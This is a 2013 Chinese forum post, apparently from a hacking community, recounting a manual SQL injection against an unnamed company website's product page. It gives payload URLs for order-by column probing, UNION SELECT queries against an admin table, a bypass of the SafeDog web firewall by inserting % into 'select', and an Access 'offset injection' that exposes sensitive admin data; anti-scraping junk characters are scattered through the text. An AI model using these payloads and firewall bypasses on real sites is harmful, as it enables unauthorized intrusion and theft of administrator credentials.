找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2173|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
" q( Q+ Q6 A3 w, P# t# J9 E
5 }3 q  m# o! T7 g& `
0 P" `: b- o4 t, ?& I" \: ?顺手加个admin9 G% {4 ?' o- u* X1 h2 F

5 J* e; Q( f6 z. y
2 L$ ]: S, P) _+ j4 K5 D) Z默认后台。
2 w# j& i' b+ _9 l$ }  `! r回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​# q* `& r' K  ~& C6 m- J9 i/ |
  v# I  q. d, @$ h4 i3 d
. P& j6 B; z# S
! Z) s, g7 R+ F
所以就不用御剑扫了,待会直接封IP。
# a% C/ B% d4 r( Z+ p
: m' J5 o* q, B$ `用order by语句判断是否存在注入。- p- [; v9 Y4 b
http://www.xxx.com /product_show.asp?id=997 order by 1
1 d" Q$ S# t4 c. R7 P: n" I# uhttp://www.xxx.com /product_show.asp?id=997 order by 100
5 f% E- ^5 u) y现在存在注入,经测试后发现是9个字段。" X6 o* q& o( D! U

# [" m" Q) G  p: l9 [7 u  T3 r接下来进行联合查询,猜是否存在admin表。8 }/ f6 R) ~( f7 J6 g0 }% V0 _
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​  h! S5 n/ ]  B+ {! r; x1 n( W' J
5 K6 N* ]/ e8 f, `* o" u

4 r6 ]; m5 o" R
' X3 c; V. U6 _4 {6 q在select中间加个%,se%lect绕过安全狗。
# S, j! j& V+ {* D5 [4 f
* Q3 i$ n5 @( Q: H
' b" \7 S9 T9 a9 c/ c- D% z' X发现存在admin表,然后开始手工猜常用的字段。) Z/ X' z+ q+ g
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
/ C) R( D! e" N* y- J7 m/ `
% r7 n  k* \. a7 h突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ {: w, |! N+ a% s# @, u

1 j+ N3 N7 O3 t" }2 _, F科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。7 Y2 }1 W! b8 e
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin# b) S! N/ L. @
好了,敏感内容出显了。​
, G, q6 ]: s( C- t* l' Z. @
4 b  Q& v# p- M; E, p) p, Y8 l
0 p3 N# R# u7 o2 i
& x* c: u& w2 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表